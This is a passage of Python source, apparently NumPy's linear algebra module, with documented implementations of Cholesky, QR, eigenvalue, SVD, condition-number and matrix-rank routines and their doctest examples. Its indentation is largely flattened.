Return the Cholesky decomposition, `L * L.H`, of the square matrix `a`,
where `L` is lower-triangular and .H is the conjugate transpose operator
(which is the ordinary transpose if `a` is real-valued). `a` must be
Hermitian (symmetric if real-valued) and positive-definite. Only `L` is
actually returned.
Parameters
----------
a : (..., M, M) array_like
Hermitian (symmetric if all elements are real), positive-definite
input matrix.
Returns
-------
L : (..., M, M) array_like
Upper or lower-triangular Cholesky factor of `a`. Returns a
matrix object if `a` is a matrix object.
Raises
------
LinAlgError
If the decomposition fails, for example, if `a` is not
positive-definite.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The Cholesky decomposition is often used as a fast way of solving
.. math:: A \\mathbf{x} = \\mathbf{b}
(when `A` is both Hermitian/symmetric and positive-definite).
First, we solve for :math:`\\mathbf{y}` in
.. math:: L \\mathbf{y} = \\mathbf{b},
and then for :math:`\\mathbf{x}` in
.. math:: L.H \\mathbf{x} = \\mathbf{y}.
Examples
--------
>>> A = np.array([[1,-2j],[2j,5]])
>>> A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> L = np.linalg.cholesky(A)
>>> L
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> np.dot(L, L.T.conj()) # verify that L * L.H = A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> A = [[1,-2j],[2j,5]] # what happens if A is only array_like?
>>> np.linalg.cholesky(A) # an ndarray object is returned
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> # But a matrix object is returned if A is a matrix object
>>> LA.cholesky(np.matrix(A))
matrix([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
"""
extobj = get_linalg_error_extobj(_raise_linalgerror_nonposdef)
gufunc = _umath_linalg.cholesky_lo
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = gufunc(a, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
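# Editor's sketch (not part of the original module): the two triangular
# solves described in the cholesky() notes, L y = b followed by L.H x = y,
# written out with plain forward/back substitution.
def _example_cholesky_solve(A, b):
    L = cholesky(asarray(A, dtype=cdouble))
    b = asarray(b, dtype=cdouble)
    n = L.shape[0]
    y = zeros(n, cdouble)
    for i in range(n):                        # forward: L y = b
        y[i] = (b[i] - dot(L[i, :i], y[:i])) / L[i, i]
    Lh = L.conj().T
    x = zeros(n, cdouble)
    for i in range(n - 1, -1, -1):            # backward: L.H x = y
        x[i] = (y[i] - dot(Lh[i, i+1:], x[i+1:])) / Lh[i, i]
    return x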
# QR decompostion
def qr(a, mode='reduced'):
"""
Compute the qr factorization of a matrix.
Factor the matrix `a` as *qr*, where `q` is orthonormal and `r` is
upper-triangular.
Parameters
----------
a : array_like, shape (M, N)
Matrix to be factored.
mode : {'reduced', 'complete', 'r', 'raw', 'full', 'economic'}, optional
If K = min(M, N), then
'reduced' : returns q, r with dimensions (M, K), (K, N) (default)
'complete' : returns q, r with dimensions (M, M), (M, N)
'r' : returns r only with dimensions (K, N)
'raw' : returns h, tau with dimensions (N, M), (K,)
'full' : alias of 'reduced', deprecated
'economic' : returns h from 'raw', deprecated.
    The options 'reduced', 'complete', and 'raw' are new in numpy 1.8,
see the notes for more information. The default is 'reduced' and to
maintain backward compatibility with earlier versions of numpy both
it and the old default 'full' can be omitted. Note that array h
returned in 'raw' mode is transposed for calling Fortran. The
'economic' mode is deprecated. The modes 'full' and 'economic' may
be passed using only the first letter for backwards compatibility,
but all others must be spelled out. See the Notes for more
explanation.
Returns
-------
q : ndarray of float or complex, optional
A matrix with orthonormal columns. When mode = 'complete' the
result is an orthogonal/unitary matrix depending on whether or not
a is real/complex. The determinant may be either +/- 1 in that
case.
r : ndarray of float or complex, optional
The upper-triangular matrix.
(h, tau) : ndarrays of np.double or np.cdouble, optional
The array h contains the Householder reflectors that generate q
along with r. The tau array contains scaling factors for the
reflectors. In the deprecated 'economic' mode only h is returned.
Raises
------
LinAlgError
If factoring fails.
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, and zungqr.
For more information on the qr factorization, see for example:
http://en.wikipedia.org/wiki/QR_factorization
Subclasses of `ndarray` are preserved except for the 'raw' mode. So if
`a` is of type `matrix`, all the return values will be matrices too.
New 'reduced', 'complete', and 'raw' options for mode were added in
NumPy 1.8.0 and the old option 'full' was made an alias of 'reduced'. In
addition the options 'full' and 'economic' were deprecated. Because
'full' was the previous default and 'reduced' is the new default,
backward compatibility can be maintained by letting `mode` default.
The 'raw' option was added so that LAPACK routines that can multiply
arrays by q using the Householder reflectors can be used. Note that in
this case the returned arrays are of type np.double or np.cdouble and
the h array is transposed to be FORTRAN compatible. No routines using
the 'raw' return are currently exposed by numpy, but some are available
in lapack_lite and just await the necessary work.
Examples
--------
>>> a = np.random.randn(9, 6)
>>> q, r = np.linalg.qr(a)
>>> np.allclose(a, np.dot(q, r)) # a does equal qr
True
>>> r2 = np.linalg.qr(a, mode='r')
>>> r3 = np.linalg.qr(a, mode='economic')
>>> np.allclose(r, r2) # mode='r' returns the same r as mode='full'
True
>>> # But only triu parts are guaranteed equal when mode='economic'
>>> np.allclose(r, np.triu(r3[:6,:6], k=0))
True
Example illustrating a common use of `qr`: solving of least squares
problems
What are the least-squares-best `m` and `y0` in ``y = y0 + mx`` for
the following data: {(0,1), (1,0), (1,2), (2,1)}. (Graph the points
and you'll see that it should be y0 = 0, m = 1.) The answer is provided
by solving the over-determined matrix equation ``Ax = b``, where::
A = array([[0, 1], [1, 1], [1, 1], [2, 1]])
x = array([[y0], [m]])
b = array([[1], [0], [2], [1]])
If A = qr such that q is orthonormal (which is always possible via
Gram-Schmidt), then ``x = inv(r) * (q.T) * b``. (In numpy practice,
however, we simply use `lstsq`.)
>>> A = np.array([[0, 1], [1, 1], [1, 1], [2, 1]])
>>> A
array([[0, 1],
[1, 1],
[1, 1],
[2, 1]])
>>> b = np.array([1, 0, 2, 1])
>>> q, r = LA.qr(A)
>>> p = np.dot(q.T, b)
>>> np.dot(LA.inv(r), p)
array([ 1.1e-16, 1.0e+00])
"""
if mode not in ('reduced', 'complete', 'r', 'raw'):
if mode in ('f', 'full'):
# 2013-04-01, 1.8
msg = "".join((
"The 'full' option is deprecated in favor of 'reduced'.\n",
"For backward compatibility let mode default."))
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'reduced'
elif mode in ('e', 'economic'):
# 2013-04-01, 1.8
msg = "The 'economic' option is deprecated."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'economic'
else:
raise ValueError("Unrecognized mode '%s'" % mode)
a, wrap = _makearray(a)
_assertRank2(a)
_assertNoEmpty2d(a)
m, n = a.shape
t, result_t = _commonType(a)
a = _fastCopyAndTranspose(t, a)
a = _to_native_byte_order(a)
mn = min(m, n)
tau = zeros((mn,), t)
if isComplexType(t):
lapack_routine = lapack_lite.zgeqrf
routine_name = 'zgeqrf'
else:
lapack_routine = lapack_lite.dgeqrf
routine_name = 'dgeqrf'
# calculate optimal size of work data 'work'
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# do qr decomposition
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# handle modes that don't return q
if mode == 'r':
r = _fastCopyAndTranspose(result_t, a[:, :mn])
return wrap(triu(r))
if mode == 'raw':
return a, tau
if mode == 'economic':
if t != result_t :
a = a.astype(result_t, copy=False)
return wrap(a.T)
# generate q from a
if mode == 'complete' and m > n:
mc = m
q = empty((m, m), t)
else:
mc = mn
q = empty((n, m), t)
q[:n] = a
if isComplexType(t):
lapack_routine = lapack_lite.zungqr
routine_name = 'zungqr'
else:
lapack_routine = lapack_lite.dorgqr
routine_name = 'dorgqr'
# determine optimal lwork
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# compute q
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
q = _fastCopyAndTranspose(result_t, q[:mc])
r = _fastCopyAndTranspose(result_t, a[:, :mc])
return wrap(q), wrap(triu(r))
# Eigenvalues
def eigvals(a):
"""
Compute the eigenvalues of a general matrix.
Main difference between `eigvals` and `eig`: the eigenvectors aren't
returned.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues will be computed.
Returns
-------
w : (..., M,) ndarray
The eigenvalues, each repeated according to its multiplicity.
They are not necessarily ordered, nor are they necessarily
real for real matrices.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
Examples
--------
Illustration, using the fact that the eigenvalues of a diagonal matrix
are its diagonal elements, that multiplying a matrix on the left
by an orthogonal matrix, `Q`, and on the right by `Q.T` (the transpose
of `Q`), preserves the eigenvalues of the "middle" matrix. In other words,
if `Q` is orthogonal, then ``Q * A * Q.T`` has the same eigenvalues as
``A``:
>>> from numpy import linalg as LA
>>> x = np.random.random()
>>> Q = np.array([[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]])
>>> LA.norm(Q[0, :]), LA.norm(Q[1, :]), np.dot(Q[0, :],Q[1, :])
(1.0, 1.0, 0.0)
Now multiply a diagonal matrix by Q on one side and by Q.T on the other:
>>> D = np.diag((-1,1))
>>> LA.eigvals(D)
array([-1., 1.])
>>> A = np.dot(Q, D)
>>> A = np.dot(A, Q.T)
>>> LA.eigvals(A)
array([ 1., -1.])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
return empty(a.shape[-1:], dtype=result_t)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->D' if isComplexType(t) else 'd->D'
w = _umath_linalg.eigvals(a, signature=signature, extobj=extobj)
if not isComplexType(t):
if all(w.imag == 0):
w = w.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
return w.astype(result_t, copy=False)
def eigvalsh(a, UPLO='L'):
"""
Compute the eigenvalues of a Hermitian or real symmetric matrix.
Main difference from eigh: the eigenvectors are not computed.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues are to be
computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M,) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
eigvals : eigenvalues of general real or complex arrays.
eig : eigenvalues and right eigenvectors of general real or complex
arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues are computed using LAPACK routines _syevd, _heevd
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> LA.eigvalsh(a)
array([ 0.17157288, 5.82842712])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eigvals()
>>> # with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa = LA.eigvalsh(a)
>>> wb = LA.eigvals(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigvalsh_lo
else:
gufunc = _umath_linalg.eigvalsh_up
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
return empty(a.shape[-1:], dtype=result_t)
signature = 'D->d' if isComplexType(t) else 'd->d'
w = gufunc(a, signature=signature, extobj=extobj)
return w.astype(_realType(result_t), copy=False)
def _convertarray(a):
t, result_t = _commonType(a)
a = _fastCT(a.astype(t))
return a, t, result_t
# Eigenvectors
def eig(a):
"""
Compute the eigenvalues and right eigenvectors of a square array.
Parameters
----------
a : (..., M, M) array
Matrices for which the eigenvalues and right eigenvectors will
be computed
Returns
-------
w : (..., M) array
The eigenvalues, each repeated according to its multiplicity.
The eigenvalues are not necessarily ordered. The resulting
array will be of complex type, unless the imaginary part is
zero in which case it will be cast to a real type. When `a`
is real the resulting eigenvalues will be real (0 imaginary
part) or occur in conjugate pairs
v : (..., M, M) array
The normalized (unit "length") eigenvectors, such that the
column ``v[:,i]`` is the eigenvector corresponding to the
eigenvalue ``w[i]``.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a symmetric or Hermitian
(conjugate symmetric) array.
eigvalsh : eigenvalues of a symmetric or Hermitian (conjugate symmetric)
array.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
The number `w` is an eigenvalue of `a` if there exists a vector
`v` such that ``dot(a,v) = w * v``. Thus, the arrays `a`, `w`, and
`v` satisfy the equations ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``
for :math:`i \\in \\{0,...,M-1\\}`.
The array `v` of eigenvectors may not be of maximum rank, that is, some
of the columns may be linearly dependent, although round-off error may
obscure that fact. If the eigenvalues are all different, then theoretically
the eigenvectors are linearly independent. Likewise, the (complex-valued)
matrix of eigenvectors `v` is unitary if the matrix `a` is normal, i.e.,
if ``dot(a, a.H) = dot(a.H, a)``, where `a.H` denotes the conjugate
transpose of `a`.
Finally, it is emphasized that `v` consists of the *right* (as in
right-hand side) eigenvectors of `a`. A vector `y` satisfying
``dot(y.T, a) = z * y.T`` for some number `z` is called a *left*
eigenvector of `a`, and, in general, the left and right eigenvectors
of a matrix are not necessarily the (perhaps conjugate) transposes
of each other.
References
----------
G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando, FL,
Academic Press, Inc., 1980, Various pp.
Examples
--------
>>> from numpy import linalg as LA
(Almost) trivial example with real e-values and e-vectors.
>>> w, v = LA.eig(np.diag((1, 2, 3)))
>>> w; v
array([ 1., 2., 3.])
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
Real matrix possessing complex e-values and e-vectors; note that the
e-values are complex conjugates of each other.
>>> w, v = LA.eig(np.array([[1, -1], [1, 1]]))
>>> w; v
array([ 1. + 1.j, 1. - 1.j])
array([[ 0.70710678+0.j , 0.70710678+0.j ],
[ 0.00000000-0.70710678j, 0.00000000+0.70710678j]])
Complex-valued matrix with real e-values (but complex-valued e-vectors);
note that a.conj().T = a, i.e., a is Hermitian.
>>> a = np.array([[1, 1j], [-1j, 1]])
>>> w, v = LA.eig(a)
>>> w; v
array([ 2.00000000e+00+0.j, 5.98651912e-36+0.j]) # i.e., {2, 0}
array([[ 0.00000000+0.70710678j, 0.70710678+0.j ],
[ 0.70710678+0.j , 0.00000000+0.70710678j]])
Be careful about round-off error!
>>> a = np.array([[1 + 1e-9, 0], [0, 1 - 1e-9]])
>>> # Theor. e-values are 1 +/- 1e-9
>>> w, v = LA.eig(a)
>>> w; v
array([ 1., 1.])
array([[ 1., 0.],
[ 0., 1.]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
w = empty(a.shape[-1:], dtype=result_t)
vt = empty(a.shape, dtype=result_t)
return w, wrap(vt)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->DD' if isComplexType(t) else 'd->DD'
w, vt = _umath_linalg.eig(a, signature=signature, extobj=extobj)
if not isComplexType(t) and all(w.imag == 0.0):
w = w.real
vt = vt.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
vt = vt.astype(result_t, copy=False)
return w.astype(result_t, copy=False), wrap(vt)
def eigh(a, UPLO='L'):
"""
Return the eigenvalues and eigenvectors of a Hermitian or symmetric matrix.
Returns two objects, a 1-D array containing the eigenvalues of `a`, and
a 2-D square array or matrix (depending on the input type) of the
corresponding eigenvectors (in columns).
Parameters
----------
a : (..., M, M) array
Hermitian/Symmetric matrices whose eigenvalues and
eigenvectors are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
v : {(..., M, M) ndarray, (..., M, M) matrix}
The column ``v[:, i]`` is the normalized eigenvector corresponding
to the eigenvalue ``w[i]``. Will return a matrix object if `a` is
a matrix object.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eig : eigenvalues and right eigenvectors for non-symmetric arrays.
eigvals : eigenvalues of non-symmetric arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues/eigenvectors are computed using LAPACK routines _syevd,
_heevd
The eigenvalues of real symmetric or complex Hermitian matrices are
always real. [1]_ The array `v` of (column) eigenvectors is unitary
and `a`, `w`, and `v` satisfy the equations
``dot(a, v[:, i]) = w[i] * v[:, i]``.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 222.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> a
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(a)
>>> w; v
array([ 0.17157288, 5.82842712])
array([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> np.dot(a, v[:, 0]) - w[0] * v[:, 0] # verify 1st e-val/vec pair
array([2.77555756e-17 + 0.j, 0. + 1.38777878e-16j])
>>> np.dot(a, v[:, 1]) - w[1] * v[:, 1] # verify 2nd e-val/vec pair
array([ 0.+0.j, 0.+0.j])
>>> A = np.matrix(a) # what happens if input is a matrix object
>>> A
matrix([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(A)
>>> w; v
array([ 0.17157288, 5.82842712])
matrix([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eig() with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa, va = LA.eigh(a)
>>> wb, vb = LA.eig(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
>>> va; vb
array([[-0.44721360-0.j , -0.89442719+0.j ],
[ 0.00000000+0.89442719j, 0.00000000-0.4472136j ]])
array([[ 0.89442719+0.j , 0.00000000-0.4472136j],
[ 0.00000000-0.4472136j, 0.89442719+0.j ]])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
w = empty(a.shape[-1:], dtype=result_t)
vt = empty(a.shape, dtype=result_t)
return w, wrap(vt)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigh_lo
else:
gufunc = _umath_linalg.eigh_up
signature = 'D->dD' if isComplexType(t) else 'd->dd'
w, vt = gufunc(a, signature=signature, extobj=extobj)
w = w.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return w, wrap(vt)
# Singular value decomposition
def svd(a, full_matrices=1, compute_uv=1):
"""
Singular Value Decomposition.
Factors the matrix `a` as ``u * np.diag(s) * v``, where `u` and `v`
are unitary and `s` is a 1-d array of `a`'s singular values.
Parameters
----------
a : (..., M, N) array_like
        A real or complex matrix of shape (`M`, `N`).
full_matrices : bool, optional
If True (default), `u` and `v` have the shapes (`M`, `M`) and
(`N`, `N`), respectively. Otherwise, the shapes are (`M`, `K`)
and (`K`, `N`), respectively, where `K` = min(`M`, `N`).
compute_uv : bool, optional
Whether or not to compute `u` and `v` in addition to `s`. True
by default.
Returns
-------
u : { (..., M, M), (..., M, K) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
s : (..., K) array
The singular values for every matrix, sorted in descending order.
v : { (..., N, N), (..., K, N) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
Raises
------
LinAlgError
If SVD computation does not converge.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The decomposition is performed using LAPACK routine _gesdd
The SVD is commonly written as ``a = U S V.H``. The `v` returned
by this function is ``V.H`` and ``u = U``.
If ``U`` is a unitary matrix, it means that it
satisfies ``U.H = inv(U)``.
The rows of `v` are the eigenvectors of ``a.H a``. The columns
of `u` are the eigenvectors of ``a a.H``. For row ``i`` in
`v` and column ``i`` in `u`, the corresponding eigenvalue is
``s[i]**2``.
If `a` is a `matrix` object (as opposed to an `ndarray`), then so
are all the return values.
Examples
--------
>>> a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
Reconstruction based on full SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=True)
>>> U.shape, V.shape, s.shape
((9, 9), (6, 6), (6,))
>>> S = np.zeros((9, 6), dtype=complex)
>>> S[:6, :6] = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
Reconstruction based on reduced SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=False)
>>> U.shape, V.shape, s.shape
((9, 6), (6, 6), (6,))
>>> S = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
"""
a, wrap = _makearray(a)
_assertNoEmpty2d(a)
_assertRankAtLeast2(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(_raise_linalgerror_svd_nonconvergence)
m = a.shape[-2]
n = a.shape[-1]
if compute_uv:
if full_matrices:
if m < n:
gufunc = _umath_linalg.svd_m_f
else:
gufunc = _umath_linalg.svd_n_f
else:
if m < n:
gufunc = _umath_linalg.svd_m_s
else:
gufunc = _umath_linalg.svd_n_s
signature = 'D->DdD' if isComplexType(t) else 'd->ddd'
u, s, vt = gufunc(a, signature=signature, extobj=extobj)
u = u.astype(result_t, copy=False)
s = s.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return wrap(u), s, wrap(vt)
else:
if m < n:
gufunc = _umath_linalg.svd_m
else:
gufunc = _umath_linalg.svd_n
signature = 'D->d' if isComplexType(t) else 'd->d'
s = gufunc(a, signature=signature, extobj=extobj)
s = s.astype(_realType(result_t), copy=False)
return s
def cond(x, p=None):
"""
Compute the condition number of a matrix.
This function is capable of returning the condition number using
one of seven different norms, depending on the value of `p` (see
Parameters below).
Parameters
----------
x : (..., M, N) array_like
The matrix whose condition number is sought.
p : {None, 1, -1, 2, -2, inf, -inf, 'fro'}, optional
Order of the norm:
===== ============================
p norm for matrices
===== ============================
None 2-norm, computed directly using the ``SVD``
'fro' Frobenius norm
inf max(sum(abs(x), axis=1))
-inf min(sum(abs(x), axis=1))
1 max(sum(abs(x), axis=0))
-1 min(sum(abs(x), axis=0))
2 2-norm (largest sing. value)
-2 smallest singular value
===== ============================
inf means the numpy.inf object, and the Frobenius norm is
the root-of-sum-of-squares norm.
Returns
-------
c : {float, inf}
The condition number of the matrix. May be infinite.
See Also
--------
numpy.linalg.norm
Notes
-----
The condition number of `x` is defined as the norm of `x` times the
norm of the inverse of `x` [1]_; the norm can be the usual L2-norm
(root-of-sum-of-squares) or one of a number of other matrix norms.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, Orlando, FL,
Academic Press, Inc., 1980, pg. 285.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
>>> a
array([[ 1, 0, -1],
[ 0, 1, 0],
[ 1, 0, 1]])
>>> LA.cond(a)
1.4142135623730951
>>> LA.cond(a, 'fro')
3.1622776601683795
>>> LA.cond(a, np.inf)
2.0
>>> LA.cond(a, -np.inf)
1.0
>>> LA.cond(a, 1)
2.0
>>> LA.cond(a, -1)
1.0
>>> LA.cond(a, 2)
1.4142135623730951
>>> LA.cond(a, -2)
0.70710678118654746
>>> min(LA.svd(a, compute_uv=0))*min(LA.svd(LA.inv(a), compute_uv=0))
0.70710678118654746
"""
x = asarray(x) # in case we have a matrix
if p is None:
s = svd(x, compute_uv=False)
return s[..., 0]/s[..., -1]
else:
return norm(x, p, axis=(-2, -1)) * norm(inv(x), p, axis=(-2, -1))
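# Editor's note: for p other than None the definition above is applied
# literally, so e.g. cond(x, 2) == norm(x, 2) * norm(inv(x), 2) up to
# roundoff, which for p=2 agrees with the SVD-based default s[..., 0]/s[..., -1].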
def matrix_rank(M, tol=None):
"""
Return matrix rank of array using SVD method
Rank of the array is the number of SVD singular values of the array that are
greater than `tol`.
Parameters
----------
M : {(M,), (..., M, N)} array_like
input vector or stack of matrices
tol : {None, float}, optional
threshold below which SVD values are considered zero. If `tol` is
None, and ``S`` is an array with singular values for `M`, and
``eps`` is the epsilon value for datatype of ``S``, then `tol` is
set to ``S.max() * max(M.shape) * eps``.
Notes
-----
The default threshold to detect rank deficiency is a test on the magnitude
of the singular values of `M`. By default, we identify singular values less
than ``S.max() * max(M.shape) * eps`` as indicating rank deficiency (with
the symbols defined above). This is the algorithm MATLAB uses [1]. It also
appears in *Numerical recipes* in the discussion of SVD solutions for linear
least squares [2].
This default threshold is designed to detect rank deficiency accounting for
the numerical errors of the SVD computation. Imagine that there is a column
in `M` that is an exact (in floating point) linear combination of other
columns in `M`. Computing the SVD on `M` will not produce a singular value
exactly equal to 0 in general: any difference of the smallest SVD value from
0 will be caused by numerical imprecision in the calculation of the SVD.
Our threshold for small SVD values takes this numerical imprecision into
account, and the default threshold will detect such numerical rank
deficiency. The threshold may declare a matrix `M` rank deficient even if
the linear combination of some columns of `M` is not exactly equal to
another column of `M` but only numerically very close to another column of
`M`.
We chose our default threshold because it is in wide use. Other thresholds
are possible. For example, elsewhere in the 2007 edition of *Numerical
recipes* there is an alternative threshold of ``S.max() *
np.finfo(M.dtype).eps / 2. * np.sqrt(m + n + 1.)``. The authors describe
this threshold as being based on "expected roundoff error" (p 71).
The thresholds above deal with floating point roundoff error in the
calculation of the SVD. However, you may have more information about the
sources of error in `M` that would make you consider other tolerance values
to detect *effective* rank deficiency. The most useful measure of the
tolerance depends on the operations you intend to use on your matrix. For
example, if your data come from uncertain measurements with uncertainties
greater than floating point epsilon, choosing a tolerance near that
uncertainty may be preferable. The tolerance may be absolute if the
uncertainties are absolute rather than relative.
References
----------
    .. [1] MATLAB reference documentation, "Rank"
http://www.mathworks.com/help/techdoc/ref/rank.html
.. [2] W. H. Press, S. A. Teukolsky, W. T. Vetterling and B. P. Flannery,
"Numerical Recipes (3rd edition)", Cambridge University Press, 2007,
page 795.
Examples
--------
>>> from numpy.linalg import matrix_rank
>>> matrix_rank(np.eye(4)) # Full rank matrix
4
>>> I=np.eye(4); I[-1,-1] = 0. # rank deficient matrix
>>> matrix_rank(I)
3
>>> matrix_rank(np.ones((4,))) # 1 dimension - rank 1 unless all 0
1
>>> matrix_rank(np.zeros((4,)))
0
"""
M = asarray(M)
if M.ndim < 2:
return int(not all(M==0))
S = svd(M, compute_uv=False)
if tol is None:
tol = S.max(axis=-1, keepdims=True) * max(M.shape[-2:]) * finfo(S.dtype).eps
